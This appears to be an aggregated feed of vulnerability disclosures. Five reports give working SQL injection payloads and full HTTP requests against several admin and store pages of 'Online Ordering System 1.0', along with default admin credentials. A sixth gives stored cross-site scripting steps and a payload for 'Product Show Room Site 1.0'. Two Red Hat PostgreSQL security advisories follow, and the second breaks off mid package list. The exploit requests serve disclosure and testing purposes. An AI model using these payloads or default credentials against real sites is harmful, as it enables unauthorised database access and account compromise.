Online Ordering System 1.0 by oretnom23 is vulnerable to SQL Injection via admin/vieworders.php.

Permalink

Cannot retrieve contributors at this time

**Online Ordering System v1.0 by oretnom23 has SQL injection**

Author： k0xx

The password for the backend login account is: admin/admin

vendors: https://www.sourcecodester.com/php/5125/online-ordering-system-using-phpmysql.html

Vulnerability File: /onlineordering/admin/vieworders.php

Vulnerability location: /onlineordering/admin/vieworders.php?id=,id

\[+\] Payload: /onlineordering/admin/vieworders.php?id=MM-MDE%27%20and%20length(database())%20=12--+ // Leak place ---> id

Current database name: shoppingcart,length is 12

GET /onlineordering/admin/vieworders.php?id\=MM\-MDE%27%20and%20length(database())%20\=12\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=v112m4jpgqqtdo86av7lvbjv3l
Connection: close

When length (database (()) = 11, Content-Length: 791

When length (database (()) = 12, Content-Length: 1065

CVE-2022-30797: bug_report/SQLi-3.md at main · k0xx11/bug_report

Online Ordering System v1.0 by oretnom23 is vulnerable to SQL Injection via admin/editproductimage.php.

Permalink

Cannot retrieve contributors at this time

**Online Ordering System v1.0 by oretnom23 has SQL injection**

Author： k0xx

The password for the backend login account is: admin/admin

vendors: https://www.sourcecodester.com/php/5125/online-ordering-system-using-phpmysql.html

Vulnerability File: /onlineordering/admin/editproductimage.php

Vulnerability location: /onlineordering/admin/editproductimage.php?id=,id

\[+\] Payload: /onlineordering/admin/editproductimage.php?id=19%27%20and%20length(database())%20=12--+ // Leak place ---> id

Current database name: shoppingcart,length is 12

GET /onlineordering/admin/editproductimage.php?id\=19%27%20and%20length(database())%20\=12\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=v112m4jpgqqtdo86av7lvbjv3l
Connection: close

When length (database (()) = 11, Content-Length: 449

When length (database (()) = 12, Content-Length: 313

CVE-2022-30795: bug_report/SQLi-4.md at main · k0xx11/bug_report

Online Ordering System v1.0 by oretnom23 is vulnerable to SQL Injection via admin/viewreport.php.

Permalink

**Online Ordering System v1.0 by oretnom23 has SQL injection**

Author： k0xx

The password for the backend login account is: admin/admin

vendors: https://www.sourcecodester.com/php/5125/online-ordering-system-using-phpmysql.html

Vulnerability File: /onlineordering/admin/viewreport.php

Vulnerability location: /onlineordering/admin/viewreport.php?id=,id

\[+\] Payload: /onlineordering/admin/viewreport.php?id=TKE-KMS%27%20and%20length(database())%20=12--+ // Leak place ---> id

Current database name: shoppingcart,length is 12

GET /onlineordering/admin/viewreport.php?id\=TKE\-KMS%27%20and%20length(database())%20\=12\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=v112m4jpgqqtdo86av7lvbjv3l
Connection: close

When length (database ()) = 11, Content-Length: 1025

When length (database ()) = 12, Content-Length: 1486

CVE-2022-30798: bug_report/SQLi-2.md at main · k0xx11/bug_report

Online Ordering System v1.0 by oretnom23 is vulnerable to SQL Injection via admin/editproductetails.php.

Permalink

Cannot retrieve contributors at this time

**Online Ordering System v1.0 by oretnom23 has SQL injection**

The password for the backend login account is: admin/admin

vendors: https://www.sourcecodester.com/php/5125/online-ordering-system-using-phpmysql.html

Vulnerability File: /onlineordering/admin/editproductetails.php

Vulnerability location: /onlineordering/admin/editproductetails.php?id=, id

\[+\] Payload: ip/onlineordering/admin/editproductetails.php?id=12%27%20union%20select%201,2,database(),4,5--+

GET /onlineordering/admin/editproductetails.php?id\=12%27%20union%20select%201,2,database(),4,5\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close

CVE-2022-30794: bug_report/SQLi-1.md at main · k0xx11/bug_report

Online Ordering System v1.0 by oretnom23 has SQL injection via store/orderpage.php.

Permalink

Cannot retrieve contributors at this time

**Online Ordering System v1.0 by oretnom23 has SQL injection**

Author： k0xx

The password for the backend login account is: admin/admin

vendors: https://www.sourcecodester.com/php/5125/online-ordering-system-using-phpmysql.html

Vulnerability File: /onlineordering/store/orderpage.php

Vulnerability location: /onlineordering/store/orderpage.php?id=,id

\[+\] Payload: /onlineordering/store/orderpage.php?id=12%27%20and%20length(database())%20=12--+ // Leak place ---> id

Current database name: shoppingcart,length is 12

GET /onlineordering/store/orderpage.php?id\=12%27%20and%20length(database())%20\=12\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=v112m4jpgqqtdo86av7lvbjv3l
Connection: close

When length (database (()) = 11, Content-Length: 3541

When length (database (()) = 12, Content-Length: 2529

CVE-2022-30799: bug_report/SQLi-5.md at main · k0xx11/bug_report

Product Show Room Site version 1.0 suffers from multiple persistent cross site scripting vulnerabilities.

    # Product Show Room Site - 'Telephone' Stored Cross-Site Scripting(XSS)   #### Exploit Title: Product Show Room Site - 'Telephone' Stored Cross-Site Scripting(XSS)#### Exploit Author: webraybtl@webray.com.cn inc#### Vendor Homepage: https://www.sourcecodester.com/php/15370/product-show-room-site-phpoop-free-source-code.html#### Software Link: https://www.sourcecodester.com/download-code?nid=15370&title=Product+Show+Room+Site+in+PHP%2FOOP+Free+Source+Code#### Version: Product Show Room Site 1.0#### Tested on: Windows Server 2008 R2 Enterprise, Apache ,Mysql#### DescriptionPersistent XSS (or Stored XSS) attack is one of the three major categories of XSS attacks, the others being Non-Persistent (or Reflected) XSS and DOM-based XSS. In general, XSS attacks are based on the victim’s trust in a legitimate, but vulnerable, website or web application.Product Show Room Site does not filter the content correctly at the "Contact info-Telephone" module, resulting in the generation of stored XSS.#### Payload used:`<script>alert(111)</script>`#### Proof of Concept1. Login the CMS. Default Admin AccessUsername: adminPassword: admin1231. Open Page http://172.24.5.107/psrs/admin/?page=system_info/contact_info and click View button2. Put XSS payload  (`<script>alert(111)</script>`) in the Telephone box and click on Update to publish the page   ![image](https://user-images.githubusercontent.com/60683449/171591851-2068eea2-b789-464f-8afb-9f6b6f8eaedd.png)    3. Open http://172.24.5.107/psrs/?p=contact,Viewing the successfully published page,We can see the alert.   ![image](https://user-images.githubusercontent.com/60683449/171591881-2962a429-f2de-4979-8e27-6fdd8f62c61c.png)-------# Product Show Room Site - 'Message' Stored Cross-Site Scripting(XSS)   #### Exploit Title: Product Show Room Site - 'Message' Stored Cross-Site Scripting(XSS)#### Exploit Author: webraybtl@webray.com.cn inc#### Vendor Homepage: https://www.sourcecodester.com/php/15370/product-show-room-site-phpoop-free-source-code.html#### Software Link: https://www.sourcecodester.com/download-code?nid=15370&title=Product+Show+Room+Site+in+PHP%2FOOP+Free+Source+Code#### Version: Product Show Room Site 1.0#### Tested on: Windows Server 2008 R2 Enterprise, Apache ,Mysql#### DescriptionPersistent XSS (or Stored XSS) attack is one of the three major categories of XSS attacks, the others being Non-Persistent (or Reflected) XSS and DOM-based XSS. In general, XSS attacks are based on the victim’s trust in a legitimate, but vulnerable, website or web application.Product Show Room Site does not filter the content correctly at the "Contact info-Telephone" module, resulting in the generation of stored XSS.#### Payload used:`<script>alert(111)</script>`#### Proof of Concept1. Login the CMS. Default Admin AccessUsername: adminPassword: admin1231. Open Page http://172.24.5.107/psrs/?p=contact 2. Put XSS payload  (`<script>alert(111)</script>`) in the Message box and click on Send Message to publish the page  ![image](https://user-images.githubusercontent.com/60683449/171591580-cc3ca01c-9e37-4e05-9351-4b9d7c7749df.png)  ![image](https://user-images.githubusercontent.com/60683449/171591599-be5e8d7f-1d95-43ad-875a-9884f7052fa6.png)   4. Open http://172.24.5.107/psrs/admin/?page=inquiries,Viewing the Top 1 of Inquiries  page,We can see the alert.  ![image](https://user-images.githubusercontent.com/60683449/171591660-c12ce9ac-aab1-45e9-b99f-7514dd28f698.png)

Product Show Room Site 1.0 Cross Site Scripting

Red Hat Security Advisory 2022-4855-01 - PostgreSQL is an advanced object-relational database management system.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: postgresql:13 security update  
Advisory ID:       RHSA-2022:4855-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:4855  
Issue date:        2022-06-01  
CVE Names:         CVE-2022-1552  
====================================================================  
1. Summary:

An update for the postgresql:13 module is now available for Red Hat  
Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

PostgreSQL is an advanced object-relational database management system  
(DBMS).

The following packages have been upgraded to a later upstream version:  
postgresql (13.7).

Security Fix(es):

* postgresql: Autovacuum, REINDEX, and others omit "security restricted  
operation" sandbox (CVE-2022-1552)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

If the postgresql service is running, it will be automatically restarted  
after installing this update.

5. Bugs fixed (https://bugzilla.redhat.com/):

2081126 - CVE-2022-1552 postgresql: Autovacuum, REINDEX, and others omit "security restricted operation" sandbox

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
pg_repack-1.4.6-3.module+el8.5.0+11357+bcc62552.src.rpm  
pgaudit-1.5.0-1.module+el8.4.0+8873+b821c30a.src.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.4.0+8873+b821c30a.src.rpm  
postgresql-13.7-2.module+el8.6.0+15347+b8eabcef.src.rpm

aarch64:  
pg_repack-1.4.6-3.module+el8.5.0+11357+bcc62552.aarch64.rpm  
pg_repack-debuginfo-1.4.6-3.module+el8.5.0+11357+bcc62552.aarch64.rpm  
pg_repack-debugsource-1.4.6-3.module+el8.5.0+11357+bcc62552.aarch64.rpm  
pgaudit-1.5.0-1.module+el8.4.0+8873+b821c30a.aarch64.rpm  
pgaudit-debuginfo-1.5.0-1.module+el8.4.0+8873+b821c30a.aarch64.rpm  
pgaudit-debugsource-1.5.0-1.module+el8.4.0+8873+b821c30a.aarch64.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.4.0+8873+b821c30a.aarch64.rpm  
postgres-decoderbufs-debuginfo-0.10.0-2.module+el8.4.0+8873+b821c30a.aarch64.rpm  
postgres-decoderbufs-debugsource-0.10.0-2.module+el8.4.0+8873+b821c30a.aarch64.rpm  
postgresql-13.7-2.module+el8.6.0+15347+b8eabcef.aarch64.rpm  
postgresql-contrib-13.7-2.module+el8.6.0+15347+b8eabcef.aarch64.rpm  
postgresql-contrib-debuginfo-13.7-2.module+el8.6.0+15347+b8eabcef.aarch64.rpm  
postgresql-debuginfo-13.7-2.module+el8.6.0+15347+b8eabcef.aarch64.rpm  
postgresql-debugsource-13.7-2.module+el8.6.0+15347+b8eabcef.aarch64.rpm  
postgresql-docs-13.7-2.module+el8.6.0+15347+b8eabcef.aarch64.rpm  
postgresql-docs-debuginfo-13.7-2.module+el8.6.0+15347+b8eabcef.aarch64.rpm  
postgresql-plperl-13.7-2.module+el8.6.0+15347+b8eabcef.aarch64.rpm  
postgresql-plperl-debuginfo-13.7-2.module+el8.6.0+15347+b8eabcef.aarch64.rpm  
postgresql-plpython3-13.7-2.module+el8.6.0+15347+b8eabcef.aarch64.rpm  
postgresql-plpython3-debuginfo-13.7-2.module+el8.6.0+15347+b8eabcef.aarch64.rpm  
postgresql-pltcl-13.7-2.module+el8.6.0+15347+b8eabcef.aarch64.rpm  
postgresql-pltcl-debuginfo-13.7-2.module+el8.6.0+15347+b8eabcef.aarch64.rpm  
postgresql-server-13.7-2.module+el8.6.0+15347+b8eabcef.aarch64.rpm  
postgresql-server-debuginfo-13.7-2.module+el8.6.0+15347+b8eabcef.aarch64.rpm  
postgresql-server-devel-13.7-2.module+el8.6.0+15347+b8eabcef.aarch64.rpm  
postgresql-server-devel-debuginfo-13.7-2.module+el8.6.0+15347+b8eabcef.aarch64.rpm  
postgresql-static-13.7-2.module+el8.6.0+15347+b8eabcef.aarch64.rpm  
postgresql-test-13.7-2.module+el8.6.0+15347+b8eabcef.aarch64.rpm  
postgresql-test-debuginfo-13.7-2.module+el8.6.0+15347+b8eabcef.aarch64.rpm  
postgresql-upgrade-13.7-2.module+el8.6.0+15347+b8eabcef.aarch64.rpm  
postgresql-upgrade-debuginfo-13.7-2.module+el8.6.0+15347+b8eabcef.aarch64.rpm  
postgresql-upgrade-devel-13.7-2.module+el8.6.0+15347+b8eabcef.aarch64.rpm  
postgresql-upgrade-devel-debuginfo-13.7-2.module+el8.6.0+15347+b8eabcef.aarch64.rpm

noarch:  
postgresql-test-rpm-macros-13.7-2.module+el8.6.0+15347+b8eabcef.noarch.rpm

ppc64le:  
pg_repack-1.4.6-3.module+el8.5.0+11357+bcc62552.ppc64le.rpm  
pg_repack-debuginfo-1.4.6-3.module+el8.5.0+11357+bcc62552.ppc64le.rpm  
pg_repack-debugsource-1.4.6-3.module+el8.5.0+11357+bcc62552.ppc64le.rpm  
pgaudit-1.5.0-1.module+el8.4.0+8873+b821c30a.ppc64le.rpm  
pgaudit-debuginfo-1.5.0-1.module+el8.4.0+8873+b821c30a.ppc64le.rpm  
pgaudit-debugsource-1.5.0-1.module+el8.4.0+8873+b821c30a.ppc64le.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.4.0+8873+b821c30a.ppc64le.rpm  
postgres-decoderbufs-debuginfo-0.10.0-2.module+el8.4.0+8873+b821c30a.ppc64le.rpm  
postgres-decoderbufs-debugsource-0.10.0-2.module+el8.4.0+8873+b821c30a.ppc64le.rpm  
postgresql-13.7-2.module+el8.6.0+15347+b8eabcef.ppc64le.rpm  
postgresql-contrib-13.7-2.module+el8.6.0+15347+b8eabcef.ppc64le.rpm  
postgresql-contrib-debuginfo-13.7-2.module+el8.6.0+15347+b8eabcef.ppc64le.rpm  
postgresql-debuginfo-13.7-2.module+el8.6.0+15347+b8eabcef.ppc64le.rpm  
postgresql-debugsource-13.7-2.module+el8.6.0+15347+b8eabcef.ppc64le.rpm  
postgresql-docs-13.7-2.module+el8.6.0+15347+b8eabcef.ppc64le.rpm  
postgresql-docs-debuginfo-13.7-2.module+el8.6.0+15347+b8eabcef.ppc64le.rpm  
postgresql-plperl-13.7-2.module+el8.6.0+15347+b8eabcef.ppc64le.rpm  
postgresql-plperl-debuginfo-13.7-2.module+el8.6.0+15347+b8eabcef.ppc64le.rpm  
postgresql-plpython3-13.7-2.module+el8.6.0+15347+b8eabcef.ppc64le.rpm  
postgresql-plpython3-debuginfo-13.7-2.module+el8.6.0+15347+b8eabcef.ppc64le.rpm  
postgresql-pltcl-13.7-2.module+el8.6.0+15347+b8eabcef.ppc64le.rpm  
postgresql-pltcl-debuginfo-13.7-2.module+el8.6.0+15347+b8eabcef.ppc64le.rpm  
postgresql-server-13.7-2.module+el8.6.0+15347+b8eabcef.ppc64le.rpm  
postgresql-server-debuginfo-13.7-2.module+el8.6.0+15347+b8eabcef.ppc64le.rpm  
postgresql-server-devel-13.7-2.module+el8.6.0+15347+b8eabcef.ppc64le.rpm  
postgresql-server-devel-debuginfo-13.7-2.module+el8.6.0+15347+b8eabcef.ppc64le.rpm  
postgresql-static-13.7-2.module+el8.6.0+15347+b8eabcef.ppc64le.rpm  
postgresql-test-13.7-2.module+el8.6.0+15347+b8eabcef.ppc64le.rpm  
postgresql-test-debuginfo-13.7-2.module+el8.6.0+15347+b8eabcef.ppc64le.rpm  
postgresql-upgrade-13.7-2.module+el8.6.0+15347+b8eabcef.ppc64le.rpm  
postgresql-upgrade-debuginfo-13.7-2.module+el8.6.0+15347+b8eabcef.ppc64le.rpm  
postgresql-upgrade-devel-13.7-2.module+el8.6.0+15347+b8eabcef.ppc64le.rpm  
postgresql-upgrade-devel-debuginfo-13.7-2.module+el8.6.0+15347+b8eabcef.ppc64le.rpm

s390x:  
pg_repack-1.4.6-3.module+el8.5.0+11357+bcc62552.s390x.rpm  
pg_repack-debuginfo-1.4.6-3.module+el8.5.0+11357+bcc62552.s390x.rpm  
pg_repack-debugsource-1.4.6-3.module+el8.5.0+11357+bcc62552.s390x.rpm  
pgaudit-1.5.0-1.module+el8.4.0+8873+b821c30a.s390x.rpm  
pgaudit-debuginfo-1.5.0-1.module+el8.4.0+8873+b821c30a.s390x.rpm  
pgaudit-debugsource-1.5.0-1.module+el8.4.0+8873+b821c30a.s390x.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.4.0+8873+b821c30a.s390x.rpm  
postgres-decoderbufs-debuginfo-0.10.0-2.module+el8.4.0+8873+b821c30a.s390x.rpm  
postgres-decoderbufs-debugsource-0.10.0-2.module+el8.4.0+8873+b821c30a.s390x.rpm  
postgresql-13.7-2.module+el8.6.0+15347+b8eabcef.s390x.rpm  
postgresql-contrib-13.7-2.module+el8.6.0+15347+b8eabcef.s390x.rpm  
postgresql-contrib-debuginfo-13.7-2.module+el8.6.0+15347+b8eabcef.s390x.rpm  
postgresql-debuginfo-13.7-2.module+el8.6.0+15347+b8eabcef.s390x.rpm  
postgresql-debugsource-13.7-2.module+el8.6.0+15347+b8eabcef.s390x.rpm  
postgresql-docs-13.7-2.module+el8.6.0+15347+b8eabcef.s390x.rpm  
postgresql-docs-debuginfo-13.7-2.module+el8.6.0+15347+b8eabcef.s390x.rpm  
postgresql-plperl-13.7-2.module+el8.6.0+15347+b8eabcef.s390x.rpm  
postgresql-plperl-debuginfo-13.7-2.module+el8.6.0+15347+b8eabcef.s390x.rpm  
postgresql-plpython3-13.7-2.module+el8.6.0+15347+b8eabcef.s390x.rpm  
postgresql-plpython3-debuginfo-13.7-2.module+el8.6.0+15347+b8eabcef.s390x.rpm  
postgresql-pltcl-13.7-2.module+el8.6.0+15347+b8eabcef.s390x.rpm  
postgresql-pltcl-debuginfo-13.7-2.module+el8.6.0+15347+b8eabcef.s390x.rpm  
postgresql-server-13.7-2.module+el8.6.0+15347+b8eabcef.s390x.rpm  
postgresql-server-debuginfo-13.7-2.module+el8.6.0+15347+b8eabcef.s390x.rpm  
postgresql-server-devel-13.7-2.module+el8.6.0+15347+b8eabcef.s390x.rpm  
postgresql-server-devel-debuginfo-13.7-2.module+el8.6.0+15347+b8eabcef.s390x.rpm  
postgresql-static-13.7-2.module+el8.6.0+15347+b8eabcef.s390x.rpm  
postgresql-test-13.7-2.module+el8.6.0+15347+b8eabcef.s390x.rpm  
postgresql-test-debuginfo-13.7-2.module+el8.6.0+15347+b8eabcef.s390x.rpm  
postgresql-upgrade-13.7-2.module+el8.6.0+15347+b8eabcef.s390x.rpm  
postgresql-upgrade-debuginfo-13.7-2.module+el8.6.0+15347+b8eabcef.s390x.rpm  
postgresql-upgrade-devel-13.7-2.module+el8.6.0+15347+b8eabcef.s390x.rpm  
postgresql-upgrade-devel-debuginfo-13.7-2.module+el8.6.0+15347+b8eabcef.s390x.rpm

x86_64:  
pg_repack-1.4.6-3.module+el8.5.0+11357+bcc62552.x86_64.rpm  
pg_repack-debuginfo-1.4.6-3.module+el8.5.0+11357+bcc62552.x86_64.rpm  
pg_repack-debugsource-1.4.6-3.module+el8.5.0+11357+bcc62552.x86_64.rpm  
pgaudit-1.5.0-1.module+el8.4.0+8873+b821c30a.x86_64.rpm  
pgaudit-debuginfo-1.5.0-1.module+el8.4.0+8873+b821c30a.x86_64.rpm  
pgaudit-debugsource-1.5.0-1.module+el8.4.0+8873+b821c30a.x86_64.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.4.0+8873+b821c30a.x86_64.rpm  
postgres-decoderbufs-debuginfo-0.10.0-2.module+el8.4.0+8873+b821c30a.x86_64.rpm  
postgres-decoderbufs-debugsource-0.10.0-2.module+el8.4.0+8873+b821c30a.x86_64.rpm  
postgresql-13.7-2.module+el8.6.0+15347+b8eabcef.x86_64.rpm  
postgresql-contrib-13.7-2.module+el8.6.0+15347+b8eabcef.x86_64.rpm  
postgresql-contrib-debuginfo-13.7-2.module+el8.6.0+15347+b8eabcef.x86_64.rpm  
postgresql-debuginfo-13.7-2.module+el8.6.0+15347+b8eabcef.x86_64.rpm  
postgresql-debugsource-13.7-2.module+el8.6.0+15347+b8eabcef.x86_64.rpm  
postgresql-docs-13.7-2.module+el8.6.0+15347+b8eabcef.x86_64.rpm  
postgresql-docs-debuginfo-13.7-2.module+el8.6.0+15347+b8eabcef.x86_64.rpm  
postgresql-plperl-13.7-2.module+el8.6.0+15347+b8eabcef.x86_64.rpm  
postgresql-plperl-debuginfo-13.7-2.module+el8.6.0+15347+b8eabcef.x86_64.rpm  
postgresql-plpython3-13.7-2.module+el8.6.0+15347+b8eabcef.x86_64.rpm  
postgresql-plpython3-debuginfo-13.7-2.module+el8.6.0+15347+b8eabcef.x86_64.rpm  
postgresql-pltcl-13.7-2.module+el8.6.0+15347+b8eabcef.x86_64.rpm  
postgresql-pltcl-debuginfo-13.7-2.module+el8.6.0+15347+b8eabcef.x86_64.rpm  
postgresql-server-13.7-2.module+el8.6.0+15347+b8eabcef.x86_64.rpm  
postgresql-server-debuginfo-13.7-2.module+el8.6.0+15347+b8eabcef.x86_64.rpm  
postgresql-server-devel-13.7-2.module+el8.6.0+15347+b8eabcef.x86_64.rpm  
postgresql-server-devel-debuginfo-13.7-2.module+el8.6.0+15347+b8eabcef.x86_64.rpm  
postgresql-static-13.7-2.module+el8.6.0+15347+b8eabcef.x86_64.rpm  
postgresql-test-13.7-2.module+el8.6.0+15347+b8eabcef.x86_64.rpm  
postgresql-test-debuginfo-13.7-2.module+el8.6.0+15347+b8eabcef.x86_64.rpm  
postgresql-upgrade-13.7-2.module+el8.6.0+15347+b8eabcef.x86_64.rpm  
postgresql-upgrade-debuginfo-13.7-2.module+el8.6.0+15347+b8eabcef.x86_64.rpm  
postgresql-upgrade-devel-13.7-2.module+el8.6.0+15347+b8eabcef.x86_64.rpm  
postgresql-upgrade-devel-debuginfo-13.7-2.module+el8.6.0+15347+b8eabcef.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1552  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYpgdwtzjgjWX9erEAQg+Gg/+O1VBRVhBxtEipbQ3BDMMBnGpTHNwcMM6  
RbliF6ItstLHH/tF5GV2yVOOP66fOCaHIOVgUzx42+bGCgOVd61F611rntI6++3f  
ZLhk4J0OsDHSa9Oi3kRwsfkwz8rYWpbW//4UvNHH1445isRVAwGFLxgtMqpDo6Ey  
m2lNg22ntXM7Unn7dVQKsstAkyza123TeyAfd/YG+HA2hpst3L1/kZYUVqmdJ4BF  
Ub5e4i0tP/jOjEgGEguDAZnP8fCcGEDFBkO8pCMkcMG/Bxr+NgQxDazzbiZPOAIU  
VRrByR8/NMR6aWlAeucJ8sVKABdpVrC4Pub0XG6DH3DdyBvus9fQ7pGOA/qazfpR  
YsfjfFr4wLK/4LVis5rlbNAPpea0YNx0UM+fV7mLyqv66JuAYEhYvqnZeA1apDqG  
o6k+LV5CIuTVgQjNQmiI5eYFB/qXIjoa+I95kJhieTpBpOj+Ow/iUsuh+ddwHWvC  
eHtcWz4y7Ca0srETnv70a1i2KENvCIyd8tS1j1WedZo7abiSrz7dnPVVKFUgDCel  
eSRZeeyXiXlM6J6uvcswMQnMs+k5+dtm5eW+aC0osbjPIai1lRIjI3FeCpGBBwmc  
/tIE7pgQfjymoABResaDBznliaLeJwbCVqS0PUnKqWQHO2Z2ikztutPEV/QXe5SW  
GRX904QBukU=LLYn  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-4855-01

Red Hat Security Advisory 2022-4857-01 - PostgreSQL is an advanced object-relational database management system.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: postgresql:13 security update  
Advisory ID:       RHSA-2022:4857-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:4857  
Issue date:        2022-06-01  
CVE Names:         CVE-2022-1552  
====================================================================  
1. Summary:

An update for the postgresql:13 module is now available for Red Hat  
Enterprise Linux 8.4 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.4) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

PostgreSQL is an advanced object-relational database management system  
(DBMS).

The following packages have been upgraded to a later upstream version:  
postgresql (13.7).

Security Fix(es):

* postgresql: Autovacuum, REINDEX, and others omit "security restricted  
operation" sandbox (CVE-2022-1552)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

If the postgresql service is running, it will be automatically restarted  
after installing this update.

5. Bugs fixed (https://bugzilla.redhat.com/):

2081126 - CVE-2022-1552 postgresql: Autovacuum, REINDEX, and others omit "security restricted operation" sandbox

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.4):

Source:  
pgaudit-1.5.0-1.module+el8.4.0+8873+b821c30a.src.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.4.0+8873+b821c30a.src.rpm  
postgresql-13.7-2.module+el8.4.0+15346+22c653ca.src.rpm

aarch64:  
pgaudit-1.5.0-1.module+el8.4.0+8873+b821c30a.aarch64.rpm  
pgaudit-debuginfo-1.5.0-1.module+el8.4.0+8873+b821c30a.aarch64.rpm  
pgaudit-debugsource-1.5.0-1.module+el8.4.0+8873+b821c30a.aarch64.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.4.0+8873+b821c30a.aarch64.rpm  
postgres-decoderbufs-debuginfo-0.10.0-2.module+el8.4.0+8873+b821c30a.aarch64.rpm  
postgres-decoderbufs-debugsource-0.10.0-2.module+el8.4.0+8873+b821c30a.aarch64.rpm  
postgresql-13.7-2.module+el8.4.0+15346+22c653ca.aarch64.rpm  
postgresql-contrib-13.7-2.module+el8.4.0+15346+22c653ca.aarch64.rpm  
postgresql-contrib-debuginfo-13.7-2.module+el8.4.0+15346+22c653ca.aarch64.rpm  
postgresql-debuginfo-13.7-2.module+el8.4.0+15346+22c653ca.aarch64.rpm  
postgresql-debugsource-13.7-2.module+el8.4.0+15346+22c653ca.aarch64.rpm  
postgresql-docs-13.7-2.module+el8.4.0+15346+22c653ca.aarch64.rpm  
postgresql-docs-debuginfo-13.7-2.module+el8.4.0+15346+22c653ca.aarch64.rpm  
postgresql-plperl-13.7-2.module+el8.4.0+15346+22c653ca.aarch64.rpm  
postgresql-plperl-debuginfo-13.7-2.module+el8.4.0+15346+22c653ca.aarch64.rpm  
postgresql-plpython3-13.7-2.module+el8.4.0+15346+22c653ca.aarch64.rpm  
postgresql-plpython3-debuginfo-13.7-2.module+el8.4.0+15346+22c653ca.aarch64.rpm  
postgresql-pltcl-13.7-2.module+el8.4.0+15346+22c653ca.aarch64.rpm  
postgresql-pltcl-debuginfo-13.7-2.module+el8.4.0+15346+22c653ca.aarch64.rpm  
postgresql-server-13.7-2.module+el8.4.0+15346+22c653ca.aarch64.rpm  
postgresql-server-debuginfo-13.7-2.module+el8.4.0+15346+22c653ca.aarch64.rpm  
postgresql-server-devel-13.7-2.module+el8.4.0+15346+22c653ca.aarch64.rpm  
postgresql-server-devel-debuginfo-13.7-2.module+el8.4.0+15346+22c653ca.aarch64.rpm  
postgresql-static-13.7-2.module+el8.4.0+15346+22c653ca.aarch64.rpm  
postgresql-test-13.7-2.module+el8.4.0+15346+22c653ca.aarch64.rpm  
postgresql-test-debuginfo-13.7-2.module+el8.4.0+15346+22c653ca.aarch64.rpm  
